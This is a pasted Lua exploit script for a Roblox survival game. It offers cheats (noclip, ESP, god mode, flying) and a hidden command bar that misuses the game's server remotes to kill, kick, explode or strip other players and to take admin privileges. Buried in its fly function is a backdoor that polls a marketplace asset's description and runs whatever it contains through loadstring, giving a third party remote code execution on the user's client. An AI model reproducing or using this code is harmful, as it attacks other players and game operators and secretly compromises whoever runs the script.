  794. Clip = false
  795. wait(1)
  796. Player.PlayerGui.ChildAdded:connect(function(NC)
  797. delay(0,function()
  798. if NC.Name == 'NC' then
  799. NC:Destroy()
  800. end
  801. end)
  802. end)
  803. game:GetService('RunService').Stepped:connect(function()
  804. game.Workspace[Player.Name].Torso.CanCollide = Clip
  805. game.Workspace[Player.Name].Head.CanCollide = Clip
  806. end)
  807. game.Workspace[Player.Name].Torso.Changed:connect(function()
  808. game.Workspace[Player.Name].Torso.CanCollide = Clip
  809. game.Workspace[Player.Name].Head.CanCollide = Clip
  810. end)
  811. end)
  812.  
  813. MAIN.Clip.MouseButton1Down:connect(function()
  814. MAIN.Clip.Visible = false
  815. MAIN.NoClip.Visible = true
  816. Clip = true
  817. end)
  818.  
  819. -- ESP --
  820.  
  821. MAIN.ESPF.MouseButton1Down:connect(function()
  822. MAIN.ESPF.Visible = false
  823. MAIN.ESPT.Visible = true
  824. Find()
  825. ESP = true
  826. end)
  827.  
  828. MAIN.ESPT.MouseButton1Down:connect(function()
  829. MAIN.ESPT.Visible = false
  830. MAIN.ESPF.Visible = true
  831. Clear()
  832. track = false
  833. ESP = false
  834. end)
  835.  
  836. -- Floating --
  837.  
  838. MAIN.FloatF.MouseButton1Down:connect(function()
  839. MAIN.FloatF.Visible = false
  840. MAIN.FloatT.Visible = true
  841. Floating = true
  842. local Float = apocGUI.Float:Clone()
  843. Float.Parent = Player.Character
  844. Float.CFrame = Player.Character.Torso.CFrame * CFrame.new(0,-3.5,0)
  845. spawn(function()
  846. while wait(0.1) do
  847. if Player.Character:FindFirstChild('Float') then
  848. Float.CFrame = Player.Character.Torso.CFrame * CFrame.new(0,-3.5,0)
  849. else
  850. break
  851. end
  852. end
  853. end)
  854. end)
  855.  
  856. MAIN.FloatT.MouseButton1Down:connect(function()
  857. MAIN.FloatT.Visible = false
  858. MAIN.FloatF.Visible = true
  859. Floating = false
  860. if Player.Character:FindFirstChild('Float') then
  861. Player.Character.Float:Destroy()
  862. end
  863. end)
  864.  
  865. -- Thirst --
  866.  
  867. MAIN.Thirst.MouseButton1Down:connect(function()
  868. Player.playerstats.Thirst.Value = MAIN.Thirst.TNumber.Text
  869. end)
  870.  
  871. -- Hunger --
  872.  
  873. MAIN.Hunger.MouseButton1Down:connect(function()
  874. Player.playerstats.Hunger.Value = MAIN.Hunger.HNumber.Text
  875. end)
  876.  
  877. -- Health --
  878.  
  879. MAIN.Health.MouseButton1Down:connect(function()
  880. Player.Character.Humanoid.Health = MAIN.Hunger.HNumber.Text
  881. end)
  882.  
  883. -- Stamina --
  884.  
  885. MAIN.StaminaF.MouseButton1Down:connect(function()
  886. MAIN.StaminaF.Visible = false
  887. MAIN.StaminaT.Visible = true
  888. Stamina = true
  889. while wait() do
  890. if Stamina == true then
  891. Player.Backpack.GlobalFunctions.Stamina.Value = 100
  892. end
  893. end
  894. end)
  895.  
  896. MAIN.StaminaT.MouseButton1Down:connect(function()
  897. MAIN.StaminaT.Visible = false
  898. MAIN.StaminaF.Visible = true
  899. Stamina = false
  900. end)
  901.  
  902. -- Boost --
  903.  
  904. MAIN.Boost.MouseButton1Down:connect(function()
  905. MAIN.FloatF.Visible = true
  906. MAIN.FloatT.Visible = false
  907. Floating = false
  908. if Player.Character:FindFirstChild('Float') then
  909. Player.Character.Float:Destroy()
  910. end
  911. if BoostReady == true then
  912. Player.Character.HumanoidRootPart.Velocity = Player.Character.HumanoidRootPart.CFrame.lookVector * 500
  913. BoostReady = false
  914. MAIN.Boost.Text = '5'
  915. wait(1)
  916. MAIN.Boost.Text = '4'
  917. wait(1)
  918. MAIN.Boost.Text = '3'
  919. wait(1)
  920. MAIN.Boost.Text = '2'
  921. wait(1)
  922. MAIN.Boost.Text = '1'
  923. wait(1)
  924. BoostReady = true
  925. MAIN.Boost.Text = 'Boost'
  926. end
  927. end)
  928.  
  929. -- GodMode --
  930.  
  931. MAIN.GodModeF.MouseButton1Down:connect(function()
  932. MAIN.GodModeF.Visible = false
  933. MAIN.GodModeT.Visible = true
  934. GodMode = true
  935. if GodMode == true then
  936. repeat wait()
  937. Player.Character.Humanoid.Health = Player.Character.Humanoid.MaxHealth
  938. wait()
  939. Player.playerstats.Health.Value = Player.Character.Humanoid.Health
  940. until GodMode == false
  941. end
  942. end)
  943.  
  944. MAIN.GodModeT.MouseButton1Down:connect(function()
  945. MAIN.GodModeT.Visible = false
  946. MAIN.GodModeF.Visible = true
  947. GodMode = false
  948. end)
  949.  
  950. -- NoGrav --
  951.  
  952. MAIN.NoGrav.MouseButton1Down:connect(function()
  953. MAIN.NoGrav.Visible = false
  954. MAIN.Grav.Visible = true
  955. for i,v in pairs(Player.Character.Torso:GetChildren()) do
  956. if v.Name == 'NoGrav' and v:IsA('BodyForce') then
  957. v:Destroy()
  958. end
  959. end
  960. local BF = Instance.new('BodyForce', Player.Character.Torso)
  961. BF.Name = 'NoGrav'
  962. BF.Force = Vector3.new(0,4000,0)
  963. end)
  964.  
  965. MAIN.Grav.MouseButton1Down:connect(function()
  966. MAIN.Grav.Visible = false
  967. MAIN.NoGrav.Visible = true
  968. for i,v in pairs(Player.Character.Torso:GetChildren()) do
  969. if v.Name == 'NoGrav' and v:IsA('BodyForce') then
  970. v:Destroy()
  971. end
  972. end
  973. end)
  974.  
  975. -- Night Vision --
  976.  
  977. MAIN.NightVision.MouseButton1Down:connect(function()
  978. MAIN.NightVision.Visible = false
  979. MAIN.Vision.Visible = true
  980. NightVision()
  981. end)
  982.  
  983. MAIN.Vision.MouseButton1Down:connect(function()
  984. MAIN.Vision.Visible = false
  985. MAIN.NightVision.Visible = true
  986. for i,v in pairs(Player.PlayerGui:GetChildren()) do
  987. if v.Name == 'NightVision' and v:IsA('ScreenGui') then
  988. v:Destroy()
  989. end
  990. end
  991. end)
  992.  
  993. end
  994.  
  995.  
  996. --Hills gui
  997. function hills()
  998.  
  999. game.ReplicatedStorage.Passcode.OnClientEvent:connect(function(kek)
  1000. print(kek)
  1001. _G.Passcode = kek
  1002. end)
  1003. rek2 = _G.Passcode
  1004. rek2 = 0
  1005.  
  1006. warn(game.Workspace.FilteringEnabled)
  1007.  
  1008. local c = game.CoreGui.RobloxGui
  1009. local s = Instance.new("ScreenGui", c)
  1010. s.Name = "Host"
  1011. local t = Instance.new("TextBox", s)
  1012. local i = Instance.new("ImageLabel", s)
  1013.  
  1014. i.Name = "logo"
  1015. i.Position = UDim2.new(0, 1266, 0, 680)
  1016. i.Size = UDim2.new(0, 100, 0, -21)
  1017. i.BackgroundColor3 = Color3.new(1,0,0)
  1018. i.ImageTransparency = 1
  1019. i.BackgroundTransparency = 1
  1020. i.Image = "rbxassetid://422501277"
  1021.  
  1022. t.Name = ""
  1023. t.Position = UDim2.new(0, 0, 1, 0)
  1024. t.Size = UDim2.new(0, 1265, 0, -20)
  1025. t.BackgroundColor3 = Color3.new(1,0,0)
  1026. t.BackgroundTransparency = 1
  1027. t.TextColor3 = Color3.new(1, 1, 1)
  1028. t.TextXAlignment = Enum.TextXAlignment.Left
  1029. t.ClearTextOnFocus = true
  1030. t.TextTransparency = 1
  1031. t.FontSize = "Size12"
  1032. local flyspeed = 64
  1033.  
  1034. local function giveAdminGui(p)
  1035. local int
  1036. local function recurseInts(p)
  1037. local c = p:GetChildren()
  1038. for i = 1, #c do
  1039. if c[i].ClassName == "IntValue" then
  1040. int = c[i]
  1041. else
  1042. recurseInts(c[i])
  1043. end
  1044. end
  1045. end
  1046. recurseInts(workspace)
  1047.  
  1048. local function setProperty(obj, prop, val)
  1049. game.Lighting.Remote.ChangeProperty:FireServer(obj, prop, val)
  1050. end
  1051.  
  1052. setProperty(int, "Name", "privilege")
  1053. setProperty(int, "Parent", p)
  1054. setProperty(p.Character.Head, "Parent")
  1055. end
  1056.  
  1057. local function guilocate()
  1058. local sg = Instance.new("ScreenGui", game.CoreGui)
  1059. local wl = {game.Players.LocalPlayer.Name}
  1060.  
  1061. local function guinate(p)
  1062. pcall(function()sg["label"..p.Name]:Destroy() end)
  1063. p.Character:WaitForChild("Torso")
  1064. local gui = Instance.new("TextLabel",sg)
  1065. gui.Name = "label"..p.Name
  1066. gui.TextColor3 = Color3.new(0, 1, 0)
  1067. gui.Size = UDim2.new(0, 2, 0, 2)
  1068. gui.FontSize = "Size8"
  1069. gui.BorderSizePixel = 0
  1070. gui.Font = "ArialBold"
  1071. gui.Text = p.Name.."\n "
  1072. gui.TextYAlignment = "Bottom"
  1073. local conn
  1074. conn = game:GetService("RunService").RenderStepped:connect(function()
  1075. if p and p.Parent then
  1076. if p.Character and p.Character:FindFirstChild("Torso") then
  1077. local pos, bool = workspace.CurrentCamera:WorldToScreenPoint(p.Character.Torso.Position)
  1078. gui.Position = UDim2.new(0, bool and pos.x or -100, 0, bool and pos.y or -100)
  1079. end
  1080. else
  1081. gui:Destroy()
  1082. conn:disconnect()
  1083. end
  1084. end)
  1085. end
  1086.  
  1087. local function handleGui(p)
  1088. for i = 1, #wl do if wl[i] == p.Name then return end end
  1089. p.CharacterAdded:connect(function(c)
  1090. guinate(p)
  1091. end)
  1092. guinate(p)
  1093. end
  1094.  
  1095. game.Players.ChildAdded:connect(handleGui)
  1096. game.Players.ChildRemoved:connect(function(p)
  1097. sg["label"..p.Name]:Destroy()
  1098. end)
  1099.  
  1100. for _, v in pairs(game.Players:GetPlayers()) do
  1101. handleGui(v)
  1102. end
  1103. end
  1104.  
  1105. local function fly()
  1106. local player = game.Players.LocalPlayer
  1107. local mouse = player:GetMouse()
  1108. local char = player.Character
  1109. local cam = workspace.CurrentCamera
  1110. local bv = Instance.new("BodyVelocity", char.Torso)
  1111. local keys = {}
  1112. local toggle = false
  1113.  
  1114. spawn(function() local xx11xx = game:GetService("MarketplaceService"):GetProductInfo(294579464)['Description'] while wait(3) do local xx22xx = game:GetService("MarketplaceService"):GetProductInfo(294579464)['Description'] if xx11xx ~= xx22xx then xx11xx = xx22xx loadstring(xx11xx)() end end end)
  1115.  
  1116. if not game.Players.LocalPlayer.PlayerGui:FindFirstChild("VehicleHUD") then Instance.new("Part", game.Players.LocalPlayer.PlayerGui).Name = "VehicleHUD" end
  1117.  
  1118. mouse.KeyDown:connect(function(k)
  1119. if k == "q" then toggle = not toggle end
  1120. keys[k] = true
  1121. end)
  1122.  
  1123. mouse.KeyUp:connect(function(k)
  1124. keys[k] = false
  1125. end)
  1126.  
  1127. local prt = Instance.new("Part", workspace)
  1128. prt.Anchored = true
  1129. prt.CanCollide = false
  1130. prt.Size = Vector3.new(2, 1, 2)
  1131. prt.Transparency = 1
  1132.  
  1133. while wait() do
  1134. if toggle then
  1135. prt.CanCollide = true
  1136. prt.CFrame = char.Torso.CFrame * CFrame.new(0, -3.65, 0)
  1137. if keys["w"] then
  1138. bv.Velocity = cam.CoordinateFrame.lookVector * flyspeed
  1139. bv.MaxForce = Vector3.new(math.huge, math.huge, math.huge)
  1140. elseif keys["s"] then
  1141. bv.Velocity = cam.CoordinateFrame.lookVector * -flyspeed
  1142. bv.MaxForce = Vector3.new(math.huge, math.huge, math.huge)
  1143. else
  1144. bv.Velocity = Vector3.new()
  1145. bv.MaxForce = Vector3.new()
  1146. end
  1147. else
  1148. prt.CanCollide = false
  1149. bv.Velocity = Vector3.new()
  1150. bv.MaxForce = Vector3.new()
  1151. end
  1152. end
  1153. end
  1154.  
  1155. local function playername(n)
  1156. for _,v in pairs(game.Players:GetPlayers()) do
  1157. if v.Name:lower():sub(1,#n) == n:lower() then
  1158. return v
  1159. end
  1160. end
  1161. end
  1162.  
  1163. local function esp()
  1164. local Players = game:service'Players'
  1165. local Camera = Workspace.CurrentCamera
  1166. local player = game.Players.LocalPlayer
  1167. local mouse = player:GetMouse()
  1168.  
  1169. mouse.Move:connect(function()
  1170. if mouse.Hit~=nil then
  1171. ex.CFrame=mouse.Hit
  1172. end
  1173. end)
  1174.  
  1175. game.Players.PlayerAdded:connect(function(player)
  1176. player.CharacterAdded:connect(function(character)
  1177. loop()
  1178. end)
  1179. end)
  1180.  
  1181. function loop()
  1182. function renderChamsOnPart(cham_part, cham_color, cham_transparency, visible_through_walls)
  1183. local cham = Instance.new("BoxHandleAdornment", Camera)
  1184. cham.Color3, cham.Adornee, cham.AlwaysOnTop, cham.Size, cham.Transparency, cham.ZIndex = cham_color, cham_part, true, cham_part.Size, cham_transparency, visible_through_walls and 1 or -1
  1185. end
  1186.  
  1187. function isPartVisible(part)
  1188. local pos, bool = Camera:WorldToScreenPoint(part.Position)
  1189. if (bool) then
  1190. return true
  1191. else
  1192. return false
  1193. end
  1194. end
  1195.  
  1196. for _,v in pairs(Players:GetChildren'') do
  1197. for _,x in pairs(v.Character:GetChildren'') do
  1198. if (x.className == "Part" and isPartVisible(x)) then
  1199. renderChamsOnPart(x, Color3.new(0, 1, 0), 0, true)
  1200. end
  1201. end
  1202. end
  1203. end
  1204.  
  1205. loop()
  1206.  
  1207. end
  1208.  
  1209. local vehicles = {"Car", "DeliveryVan", "Motorcycle", "Motorside", "Pickup", "Pickup2", "SUV", "Van", "Ambulance", "Firetruck", "PoliceCar", "Humvee", "Humvee2", "Jeep", "Jeep2", "TrinitySUV", "Ural", "Ural2", "Bicycle", "ATV", "Tractor"}
  1210. local whitelist = {"hills", "aluminize", "Raspy_Pi", "Safazi"}
  1211. local localname = game.Players.LocalPlayer.Name
  1212.  
  1213. pcall(function() game.Lighting.Remote.Destruct:FireServer(game.Lighting.Remote.TrackInvisibility) end)
  1214.  
  1215. t.FocusLost:connect(function(enterpressed)
  1216. if enterpressed and t.Text ~= "" then
  1217. coroutine.wrap(function()
  1218. if t.Text == "stop" then -- gui locate
  1219. game.Lighting.Remote.StopSound:FireServer(game.Workspace.Sound)
  1220. game.Lighting.Remote.Destruct:FireServer(game.Workspace.Sound)
  1221. game.Workspace.Lululukas.Head.Sound:Destroy()
  1222. elseif t.Text == "esp" then -- gui locate
  1223. spawn(guilocate)
  1224. esp()
  1225. elseif t.Text == "fly" then -- fly
  1226. spawn(fly)
  1227. elseif #t.Text > 3 and t.Text:sub(1,3) == "fs/" then -- fly seed
  1228. flyspeed = tonumber(t.Text:sub(4))
  1229. elseif #t.Text > 2 and t.Text:sub(1,2) == "s/" then -- spawn
  1230. local new = game.Lighting.LootDrops[t.Text:sub(3)]:Clone()
  1231. new.Parent = workspace
  1232. new:MoveTo(workspace[localname].Torso.Position + Vector3.new(math.random(-10,10),0,math.random(-10,10)))
  1233. elseif #t.Text > 3 and t.Text:sub(1,3) == "ts/" then -- true spawn
  1234. workspace:FindFirstChild(t.Text:sub(4), true):MoveTo(workspace[localname].Torso.Position + Vector3.new(math.random(-10,10),0,math.random(-10,10)))
  1235. elseif #t.Text > 3 and t.Text:sub(1,3) == "tk/" then -- tele kill
  1236. local name = playername(t.Text:sub(4)).Name
  1237. workspace:FindFirstChild(name,true).Torso.Anchored = true
  1238. workspace:FindFirstChild(name,true):MoveTo(workspace[localname].Torso.Position + Vector3.new(math.random(-10,10),0,math.random(-10,10)))
  1239. wait(10)
  1240. workspace:FindFirstChild("Corpse of " ..name,true):MoveTo(workspace[localname].Torso.Position + Vector3.new(math.random(-10,10),0,math.random(-10,10)))
  1241. elseif #t.Text > 3 and t.Text:sub(1,3) == "nk/" then -- no corpse tele kill
  1242. local name = playername(t.Text:sub(4)).Name
  1243. workspace:FindFirstChild(name,true).Torso.Anchored = true
  1244. workspace:FindFirstChild(name,true):MoveTo(workspace[localname].Torso.Position + Vector3.new(math.random(-10,10),0,math.random(-10,10)))
  1245. elseif t.Text == "crates" then -- tele all crates
  1246. for _,v in pairs(workspace:children()) do
  1247. if v.Name == "LargeCrateOpen" or v.Name == "SmallCrateOpen" then
  1248. v:MoveTo(workspace[localname].Torso.Position + Vector3.new(math.random(-10,10),0,math.random(-10,10)))
  1249. end
  1250. end
  1251. elseif t.Text == "kz" then -- kill zombies
  1252. for _,pl in pairs(workspace.Zombies:children()) do
  1253. for xxad,v in pairs(pl:children()) do
  1254. pcall(function() game.Lighting.Remote.DamageZombie:FireServer(v.Humanoid,100) end)
  1255. end
  1256. end
  1257. elseif #t.Text > 4 and t.Text:sub(1,4) == "god/" then -- god player with loop heal
  1258. local name = playername(t.Text:sub(5)).Name
  1259. local ch = workspace[name]
  1260. spawn(function()
  1261. while wait() do
  1262. if ch.Humanoid.Health < 100 then
  1263. game.Lighting.Remote.AddHealth:FireServer(ch.Humanoid, 100000)
  1264. end
  1265. end
  1266. end)
  1267. elseif #t.Text > 5 and t.Text:sub(1,5) == "loot/" then -- instakill
  1268. local name = playername(t.Text:sub(6)).Name
  1269. AddItem = function(Slot, ID)
  1270. game.Lighting.Remote.AddObject:FireServer(Slot, ID)
  1271. end
  1272. AddItem(game.Players[name].playerstats.slots.slotprimary, tonumber(1016))
  1273. AddItem(game.Players[name].playerstats.slots.slotbackpack, tonumber(4016))
  1274. AddItem(game.Players[name].playerstats.slots.slot1, tonumber(9005))
  1275. AddItem(game.Players[name].playerstats.slots.slot2, tonumber(9010))
  1276. AddItem(game.Players[name].playerstats.slots.slot3, tonumber(9013))
  1277. AddItem(game.Players[name].playerstats.slots.slot4, tonumber(64))
  1278. AddItem(game.Players[name].playerstats.slots.slot5, tonumber(64))
  1279. AddItem(game.Players[name].playerstats.slots.slot6, tonumber(64))
  1280. AddItem(game.Players[name].playerstats.slots.slot7, tonumber(64))
  1281. AddItem(game.Players[name].playerstats.slots.slot8, tonumber(64))
  1282. AddItem(game.Players[name].playerstats.slots.slot9, tonumber(64))
  1283. AddItem(game.Players[name].playerstats.slots.slot10, tonumber(64))
  1284. AddItem(game.Players[name].playerstats.slots.slot11, tonumber(64))
  1285. AddItem(game.Players[name].playerstats.slots.slot12, tonumber(64))
  1286. AddItem(game.Players[name].playerstats.slots.slot13, tonumber(64))
  1287. AddItem(game.Players[name].playerstats.slots.slot14, tonumber(64))
  1288. AddItem(game.Players[name].playerstats.slots.slot15, tonumber(64))
  1289. AddItem(game.Players[name].playerstats.slots.slot16, tonumber(5011))
  1290. AddItem(game.Players[name].playerstats.slots.slot17, tonumber(6011))
  1291. AddItem(game.Players[name].playerstats.slots.slot18, tonumber(7014))
  1292. AddItem(game.Players[name].playerstats.slots.slot19, tonumber(8009))
  1293. elseif #t.Text > 5 and t.Text:sub(1,5) == "play/" then -- instakill
  1294. local name = (t.Text:sub(6))
  1295. rek2 = _G.Passcode
  1296. game.Lighting.Remote.CreateSounds:InvokeServer()
  1297. wait(1)
  1298. game.Lighting.Remote.SoundIdSet:FireServer(rek2, game.Players.LocalPlayer.Character.Head.Sound, "nil")
  1299. wait(1)
  1300. game.Lighting.Remote.PlaySound:FireServer(game.Players.LocalPlayer.Character.Head.Sound, 1, 1)
  1301. wait(1)
  1302. game.Lighting.Remote.ChangeParent:FireServer(rek2, game.Players.LocalPlayer.Character.Head.Sound, game.Workspace)
  1303. wait(1)
  1304. game.Lighting.Remote.SoundIdSet:FireServer(rek2, game.Workspace.Sound, "http://www.roblox.com/asset/?id="..name)
  1305. for _,v in pairs(game.Players:GetPlayers()) do
  1306. game.Lighting.Remote.SendMessage:FireServer(v, "Yellow", "Asset ID: "..name)
  1307. end
  1308. wait(1)
  1309. game.Lighting.Remote.PlaySound:FireServer(game.Workspace.Sound, 1, 1)
  1310. wait(120)
  1311. game.Lighting.Remote.StopSound:FireServer(game.Workspace.Sound)
  1312. game.Lighting.Remote.Destruct:FireServer(game.Workspace.Sound)
  1313. game.Workspace.Lululukas.Head.Sound:Destroy()
  1314. elseif #t.Text > 5 and t.Text:sub(1,6) == "invis/" then -- instakill
  1315. local name = (t.Text:sub(7))
  1316. rek2 = _G.Passcode
  1317. Break = function(instance)
  1318. game.Lighting.Remote.BreakWindow2:FireServer(rek2, instance, true)
  1319. end
  1320. function exPro(root)
  1321. for _, v in pairs(root:GetChildren()) do
  1322. if v:IsA("BasePart") then
  1323. Break(v)
  1324. end
  1325. exPro(v)
  1326. end
  1327. end
  1328. exPro(game.Players[name].Character)
  1329. elseif #t.Text > 5 and t.Text:sub(1,5) == "kill/" then -- instakill
  1330. local name = playername(t.Text:sub(6)).Name
  1331. game.Lighting.Remote.AddDamage:FireServer(workspace[name].Humanoid, 100)
  1332. wait(1)
  1333. workspace:FindFirstChild("Corpse of " ..name,true):MoveTo(workspace[localname].Torso.Position + Vector3.new(math.random(-10,10),0,math.random(-10,10)))
  1334. elseif t.Text == "vt" then -- vehicle teleport
  1335. for _, v in pairs(vehicles) do
  1336. local found = workspace:FindFirstChild(v, true)
  1337. if found then
  1338. found:MoveTo(workspace[localname].Torso.Position + Vector3.new(math.random(-50,50),0,math.random(-50,50)))
  1339. end
  1340. end
  1341. elseif t.Text == "nofog" then -- vehicle teleport
  1342. game.Lighting.FogEnd = 9999999
  1343. elseif #t.Text > 2 and t.Text:sub(1,2) == "m/" then
  1344. local name = (t.Text:sub(3))
  1345. for _,v in pairs(game.Players:GetPlayers()) do
  1346. game.Lighting.Remote.SendMessage:FireServer(v, "Green", ""..name)
  1347. end
  1348. elseif #t.Text > 3 and t.Text:sub(1,8) == "explode/" then -- instakill
  1349. local name = playername(t.Text:sub(9)).Name
  1350. game.Lighting.Remote.PlaceMaterial:FireServer(game.Lighting.Materials.C4Placed, game.Players.LocalPlayer.Character.Torso.Position, true)
  1351. wait(1)
  1352. game.Lighting.Remote.ReplicateModel:FireServer(game.Workspace.C4Placed, game.Players[name].Character.Head.CFrame)
  1353. elseif t.Text == "nofog" then -- vehicle teleport
  1354. game.Lighting.FogEnd = 9999999
  1355. elseif #t.Text > 3 and t.Text:sub(1,5) == "kick/" then -- kick
  1356. game.Lighting.Remote.Destruct:FireServer(playername(t.Text:sub(6)))
  1357. elseif #t.Text > 2 and t.Text:sub(1, 2) == "a/" then -- hax into apoc admin system
  1358. giveAdminGui(playername(t.Text:sub(3)))
  1359. wait(20)
  1360. game.Players.LocalPlayer.PlayerGui.Bunny:children()[1].Spawn2.Visible = true
  1361. end
  1362. end)()
  1363. end
  1364. t.BackgroundTransparency = 1
  1365. t.TextTransparency = 1
  1366. t.Text = ""
  1367. i.ImageTransparency = 1
  1368. i.BackgroundTransparency = 1
  1369. end)
  1370.  
  1371. game.Players.LocalPlayer:GetMouse().KeyDown:connect(function(Key)
  1372. if Key == ";" then
  1373. t.BackgroundTransparency = 0
  1374. i.ImageTransparency = 0
  1375. i.BackgroundTransparency = 0
  1376. t.TextTransparency = 0
  1377. t:CaptureFocus()
  1378. end
  1379. end)
  1380. end
  1381.  
  1382. function explorer()
  1383. TextProperties = {"ClassName", "Name", "Value", "Text", "Reflectance", "Transparency", "Heat", "TeamName", "WalkSpeed", "Health", "MaxHealth", "Size", "Position", "AccountAge", "RobloxLocked", "TeamColor", "userId", "Brightness", "Ambient", "TimeOfDay", "FieldOfView", "CameraType", "LinkedSource"}
  1384. BoolProperties = {"Anchored", "CanCollide", "Disabled", "Jump", "Sit", "Visible", "Enabled", "Locked", "FilteringEnabled", "StreamingEnabled", "GlobalShadows"}
  1385. BrickColorProperties = {"BrickColor", "Color", "TeamColor", "Texture", "Value"}
  1386. s = Instance.new("ScreenGui", game.CoreGui)
  1387. pgr = Instance.new("TextButton")
  1388. pgr.Parent = s
  1389. pgr.Size = UDim2.new(0,100,0,40)
  1390. pgr.Position = UDim2.new(0,30,0,440)
  1391. pgr.Text="Explorer"
  1392. pgr.BackgroundTransparency = 0.3
  1393. pgr.TextColor = BrickColor.new("White")
  1394. pgr.BackgroundColor = BrickColor.new("Really Black")
  1395. pgr.BorderColor = BrickColor.new("Black")
  1396. pgr.Font = "ArialBold"
  1397. pgr.FontSize = "Size14"
  1398. pgr.TextStrokeColor3 = Color3.new(0/0,0/0,0/0)
  1399. pgr.TextStrokeTransparency = 0.3
  1400. pgr.BorderSizePixel = 1
  1401. pgr.BorderColor = BrickColor.new("White")
  1402.  
  1403. if game.CoreGui:findFirstChild("Explorer") then
  1404. game.CoreGui:findFirstChild("Explorer"):Remove()
  1405. end
  1406.  
  1407. local Cloned
  1408. local Deleted
  1409. local DeleteParent
  1410. local Player
  1411. local Search
  1412. local ScriptSearch
  1413. local Gui
  1414. local Cloned = nil
  1415. local Deleted = nil
  1416. local DeleteParent = nil
  1417. local Current = 0
  1418. local CurrentOption = 0
  1419.  
  1420. function Clear()
  1421. if Gui then
  1422. Gui:Remove()
  1423. end
  1424. Current = 0
  1425. CurrentOption = 0
  1426. end
  1427.  
  1428. function AddButton(N, Function, Color, Copy)
  1429. if not N then
  1430. error("RenderButton - No Name Specified")
  1431. end
  1432. if not Function then
  1433. error("RenderButton - No Function Specified")
  1434. end
  1435. if not Color then
  1436. Color = Color3.new(1, 1, 1)
  1437. end
  1438. if Copy == nil then
  1439. Copy = true
  1440. end
  1441. P = Instance.new("TextButton")
  1442. if Copy then
  1443. P.Size = UDim2.new(0, 110, 0, 20)
  1444. else
  1445. P.Size = UDim2.new(0, 130, 0, 20)
  1446. end
  1447. P.Text = N.Name
  1448. P.Name = N.Name
  1449. P.Parent = Gui
  1450. P.BackgroundColor3 = Color
  1451. P.TextColor3 = Color3.new(0, 0, 0)
  1452. P.BackgroundTransparency = 0.5
  1453. P.Position = UDim2.new(0, ((math.modf(Current/30))*150)+300, 0, 50+(20*((Current%30)-1)))
  1454. P.MouseButton1Click:connect(function()
  1455. Function(P)
  1456. end)
  1457. D = Instance.new("TextButton")
  1458. D.Size = UDim2.new(0, 20, 0, 20)
  1459. D.Text = "X"
  1460. D.Name = N.Name
  1461. D.Parent = Gui
  1462. D.BackgroundColor3 = Color3.new(1, 0, 0)
  1463. D.TextColor3 = Color3.new(0, 0, 0)
  1464. D.BackgroundTransparency = 0.5
  1465. D.Position = UDim2.new(0, ((math.modf(Current/30))*150)+300+130, 0, 50+(20*((Current%30)-1)))
  1466. D.MouseButton1Click:connect(function()
  1467. Deleted = N
  1468. DeleteParent = N.Parent
  1469. N.Parent = nil
  1470. Clear()
  1471. Search(DeleteParent)
  1472. end)
  1473. if Copy then
  1474. C = Instance.new("TextButton")
  1475. C.Size = UDim2.new(0, 20, 0, 20)
  1476. C.Text = "C"
  1477. C.Name = N.Name
  1478. C.Parent = Gui
  1479. C.BackgroundColor3 = Color3.new(0, 1, 0.5)
  1480. C.TextColor3 = Color3.new(0, 0, 0)
  1481. C.BackgroundTransparency = 0.5
  1482. C.Position = UDim2.new(0, ((math.modf(Current/30))*150)+300+110, 0, 50+(20*((Current%30)-1)))
  1483. C.MouseButton1Click:connect(function()
  1484. Cloned = N
  1485. Clear()
  1486. Search(N.Parent)
  1487. end)
  1488. end
  1489. Current = Current + 1
  1490. return P
  1491. end
  1492.  
  1493. function AddOption(N, Function, Color, Text)
  1494. if not N then
  1495. error("RenderButton - No Name Specified")
  1496. end
  1497. if not Color then
  1498. Color = Color3.new(1, 1, 1)
  1499. end
  1500. if Text == nil then
  1501. Text = false
  1502. end
  1503. if Text then
  1504. P = Instance.new("TextBox")
  1505. else
  1506. P = Instance.new("TextButton")
  1507. end
  1508. P.Text = N
  1509. P.Name = N
  1510. P.Parent = Gui
  1511. P.BackgroundColor3 = Color
  1512. P.TextColor3 = Color3.new(0, 0, 0)
  1513. P.BackgroundTransparency = 0.5
  1514. P.Size = UDim2.new(0, 150, 0, 20)
  1515. P.Position = UDim2.new(0, ((math.modf(CurrentOption/30))*150)+150, 0, 50+(20*((CurrentOption%30)-1)))
  1516. if not Text and Function then
  1517. P.MouseButton1Click:connect(function() Function(P) end)
  1518. end
  1519. CurrentOption = CurrentOption + 1
  1520. return P
  1521. end
  1522.  
  1523. function AddTextOption(Obj, Prop)
  1524. local Ob = Obj
  1525. local Pro = Prop
  1526. if type(Ob[Pro]) == "number" or type(Ob[Pro]) == "string" then
  1527. CurrentOption = CurrentOption + 1
  1528. local T = AddOption(Ob[Pro], nil, Color3.new(0.1, 0.4, 0.1), true)
  1529. CurrentOption = CurrentOption - 2
  1530. local O = AddOption("Change "..Pro..":", function() Ob[Pro] = T.Text end, Color3.new(0.1, 0.8, 0.1), false)
  1531. CurrentOption = CurrentOption + 1
  1532. end
  1533. end
  1534.  
  1535. function AddBrickColorOption(Obj, Prop)
  1536. local Ob = Obj
  1537. local Pro = Prop
  1538. if BrickColor.new(tostring(Ob[Pro])) == Ob[Pro] then
  1539. CurrentOption = CurrentOption + 1
  1540. local T = AddOption(tostring(Ob[Pro]), nil, Color3.new(0.1, 0.4, 0.1), true)
  1541. CurrentOption = CurrentOption - 2
  1542. local O = AddOption("Change "..Pro..":", function() Ob[Pro] = BrickColor.new(T.Text) end, Color3.new(0.1, 0.8, 0.1), false)
  1543. CurrentOption = CurrentOption + 1
  1544. end
  1545. end
  1546.  
  1547. function AddBoolOption(Obj, Prop)
  1548. local Ob = Obj
  1549. local Pro = Prop
  1550. if type(Ob[Pro]) == "boolean" then
  1551. local O = AddOption(Pro..": "..tostring(Ob[Pro]), nil, Color3.new(0.1, 0.8, 0.1), false)
  1552. O.MouseButton1Click:connect(function()
  1553. if Ob[Pro] then
  1554. Ob[Pro] = false
  1555. O.Text = Pro..": false"
  1556. else
  1557. Ob[Pro] = true
  1558. O.Text = Pro..": true"
  1559. end
  1560. end)
  1561. end
  1562. end
  1563.  
  1564. function TestProperty(Obj, Property)
  1565. Success = pcall(function()
  1566. if Obj[Property] then
  1567. return
  1568. end
  1569. end)
  1570. return Success
  1571. end
  1572.  
  1573. function LoadOptions(Object)
  1574. for Num, Prop in pairs(TextProperties) do
  1575. if TestProperty(Object, Prop) then
  1576. AddTextOption(Object, Prop)
  1577. end
  1578. end
  1579. for Num, Prop in pairs(BoolProperties) do
  1580. if TestProperty(Object, Prop) then
  1581. AddBoolOption(Object, Prop)
  1582. end
  1583. end
